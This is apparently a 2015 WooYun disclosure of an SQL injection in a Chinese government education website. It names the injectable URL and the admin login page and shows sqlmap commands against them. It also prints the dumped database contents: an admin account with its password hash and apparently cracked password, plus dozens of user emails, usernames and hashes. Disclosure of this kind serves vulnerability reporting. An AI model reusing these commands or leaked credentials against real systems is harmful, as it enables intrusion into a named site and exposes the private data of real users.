漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0106038
漏洞标题:某政府网站注入一枚,(拿到web权限)
相关厂商:广东省信息安全测评中心
漏洞作者: 小天
提交时间:2015-04-08 14:43
修复时间:2015-05-25 10:46
公开时间:2015-05-25 10:46
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-04-08: 细节已通知厂商并且等待厂商处理中
2015-04-10: 厂商已经确认,细节仅向厂商公开
2015-04-20: 细节向核心白帽子及相关领域专家公开
2015-04-30: 细节向普通白帽子公开
2015-05-10: 细节向实习白帽子公开
2015-05-25: 细节向公众公开
简要描述:
为政府网做贡献
详细说明:
注入点;http://hjedu.dg.gov.cn/printpage.asp?articleid=7808
后台登陆点:http://hjedu.dg.gov.cn/Admin_login.asp
sqlmap.py -u http://hjedu.dg.gov.cn/printpage.asp?articleid=7
808 --tables
Database: Microsoft_Access_masterdb
[4 tables]
+---------+
| user |
| admin |
| article |
| vote |
+---------+
Database: Microsoft_Access_masterdb
Table: admin
[1 entry]
+----+------+------------+------------------+
| id | data | username | password |
+----+------+------------+------------------+
| 47 | <blank> | hjeduadmin | 5a8327c91d8b39fd |
+----+------+------------+------------------+
e0f4c4c886efc827
131422
sqlmap.py -u http://hjedu.dg.gov.cn/printpage.asp?articleid=7
808 --dump -T user
email username question homepage password
[email protected] hjjb 1234567890 http:// e0f4c4c886efc827
[email protected] ??N-[f u5?R\x06g: http:// 323b453885f5181f
[email protected] ??\\\x0f[f u5?R\x06g: http:// 76b4f3a9e37fdef6
[email protected] e\\?b0NP[fh! u5?R\x06g: http:// 3c8e92815ec07ef2
[email protected] \x7f\\?f0gp[fh! u5?R\x06g: http:// 66974dabb961440b
[email protected] ?k#\\\x0f[f u5?R\x06g: <blank> f41f17b6347a533a
[email protected] ?~\\?e3^|Q?V\\?ed u5?R\x06g: http:// 323b453885f5181f
[email protected] ??^|Q?V\\?ed u5?R\x06g: http:// 323b453885f5181f
[email protected] |\\?be?^|Q?V\\?ed u5?R\x06g: http:// f5d07af355640e9e
[email protected] r1NPQ?^|Q?V\\?ed u5?R\x06g: http:// 26ecc6bec863ca7a
[email protected] hjjbhdq fghghfgjhfg http:// ff1be1d7443810df
[email protected] SN?^|Q?V\\?ed u5?R\x06g: http:// 38463ddb042fffbd
[email protected] ~\\?a2?g\\?9c^|Q?V\\?ed u5?R\x06g: http:// fa6168e6e930a9f3
[email protected] ??^|Q?V\\?ed u5?R\x06g: http:// 294e14abda9cc7d8
[email protected] e\\?b0NP^|Q?V\\?ed u5?R\x06g: http:// f82d132f9bb018ca
[email protected] \\\x0fh\\?eeg\\?97^|Q?V\\?ed u5?R\x06g: http:// bc9d7ae819d968f4
[email protected] e\\?b0N\x16~\\?aa^|Q?V\\?ed u5?R\x06g: http:// 83aa400af464c76d
[email protected] u0_\\?c3^|Q?V\\?ed u5?R\x06g: http:// 15e53fbeabe8a4dd
[email protected] ?r[W\\?d4^|Q?V\\?ed u5?R\x06g: http:// 323b453885f5181f
[email protected] z\\?e5f\x1f^|Q?V\\?ed u5?R\x06g: http:// 0aae10455aece531
[email protected] Y*?\\\\?9b^|Q?V\\?ed u5?R\x06g: http:// f82d132f9bb018ca
[email protected] ?l_N-[f u5?R\x06g: http:// 2768f54d97c3b4f0
[email protected] hjkjbzjy ghdfghdfghdfghdf http:// 323b453885f5181f
[email protected] hjjbzz fdhsdfhsdfhfh http:// 4cbe416d4c6886b8
[email protected] xianlan wrqegwegegweg http:// 759b4ca9558b030a
[email protected] W\\?f9?^|Q?V\\?ed Q\\?e4Q\\?f0a\x1fS\\?d7R0Q\\?e4Q\\?f0 http:// f82d132f9bb018ca
[email protected] W\\?f9?\\\x0f[f N\\?caQ?S\\?bbn)l\\?c9e\\?87]\\?e5V\\?e2 http:// 0866fb86551294c4
[email protected] hjxxjszxz eqewtqwetewt http:// bc27e38a425e57e2
[email protected] hjyyzxz gagasgergwer http:// bc27e38a425e57e2
[email protected] hjmszxz jgwejs;fsd http:// bc27e38a425e57e2
[email protected] h\\?d5i\\?88l\\?c9^|Q?V\\?ed e9Y}ipjpj http:// f82d132f9bb018ca
[email protected] N-_\\?c3\\\x0f[f ?N\rY}[\\?f9N\\?d8f\\?f4Y}W0e\\?b9]\\?e5O\x1a http:// 323b453885f5181f
[email protected] hjjbkaikai sdgdgjgkhhjl http:// 0d497134e180c023
[email protected] O\\?ca\x7f\\?8e^|Q?V\\?ed gas[\\?f9Vv\\\x14ueryer http:// 7d52c47e290c0ec5
[email protected] ?miQ\\?e1 f\\?f4OUQ\\?b5\\\x06mw?zz http:// c9c38b63ab3e986a
[email protected] test qfasdasdgasdg http:// 323b453885f5181f
[email protected] f%?V\\?ed^|Q?V\\?ed f/Vv?foT\\?8cN\x1ce\\?b9~\\?a2 http:// f82d132f9bb018ca
[email protected] N\x1c?V\\?ed^|Q?V\\?ed QlS\\?f8TJ?[\\?f9e\\?b9 http:// f82d132f9bb018ca
[email protected] zbtzbt fgasdfasdf http:// f82d132f9bb018ca
[email protected] ??s\\?fa^\\?ad^|Q?V\\?ed V[Wvasd http:// 10248d640572dd40
[email protected] SN_i^|Q?V\\?ed S\\?cce\\?b9v\\?84S\\?d1u\x1fv\\?84 http:// 77804d2ba1922c33
[email protected] r1_\\?c3?^|Q?V\\?ed ^rd\\?92v\\?84V\x0ee\\?af? http:// f82d132f9bb018ca
[email protected] {,N\\?8c\\\x0f[f ?N\rY}[\\?f9N\\?d8f\\?f4Y}W0e\\?b9]\\?e5O\x1a http://www.dghjex.com 4069afd5f2a59bba
[email protected] [\\?9e?\\\x0f[f ?N\rY}[\\?f9N\\?d8f\\?f4Y}W0e\\?b9]\\?e5O\x1a http:// 083986a3a15a41b4
[email protected] h\\?85XX\\\x0f[f ?N\rY}[\\?f9N\\?d8f\\?f4Y}W0e\\?b9]\\?e5O\x1a http:// 973946fb2518ed73
[email protected] ??\\\x0f[f ?N\rY}[\\?f9N\\?d8f\\?f4Y}W0e\\?b9]\\?e5O\x1a <blank> 0f5e94db68016235
[email protected] N-_\\?c3^|Q?V\\?ed ?N\rY}[\\?f9N\\?d8f\\?f4Y}W0e\\?b9]\\?e5O\x1a http:// f787902d3274d227
漏洞证明:
rt
修复方案:
过滤
版权声明:转载请注明来源 小天@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:10
确认时间:2015-04-10 10:45
厂商回复:
非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据:高
攻击成本:低
造成影响:高
综合评级为:高,rank:10
正在联系相关网站管理单位处置。
最新状态:
暂无